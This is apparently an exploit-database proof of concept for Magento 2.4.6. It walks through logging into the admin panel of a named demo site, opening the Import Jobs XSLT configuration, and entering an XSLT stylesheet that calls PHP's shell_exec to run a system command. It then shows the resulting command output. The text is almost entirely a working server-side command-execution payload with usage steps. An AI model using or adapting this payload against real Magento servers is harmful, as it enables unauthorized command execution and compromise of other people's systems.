Magento 2.4.6 XSLT Server Side Injection / Command Execution

Exploit Title: Magento ver. 2.4.6 - XSLT Server Side Injection# Date: 2023-11-17# Exploit Author: tmrswrr# Vendor Homepage: https://magento2demo.firebearstudio.com/# Software Link:  https://github.com/magento/magento2/archive/refs/tags/2.4.6-p3.zip# Version: 2.4.6# Tested on: 2.4.6POC:1 ) Enter with admin creds this url : https://magento2demo.firebearstudio.com/2 ) Click SYSTEM > Import Jobs > Entity Type Widget > click edit 3 ) Click XSLT Configuration  and write this payload : <?xml version="1.0" encoding="utf-8"?><xsl:stylesheet version="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:php="http://php.net/xsl" ><xsl:template match="/"><xsl:value-of select="php:function('shell_exec','id')" /></xsl:template></xsl:stylesheet>4 ) Click Test XSL Template , You will be see "id" command result :<?xml version="1.0"?>uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)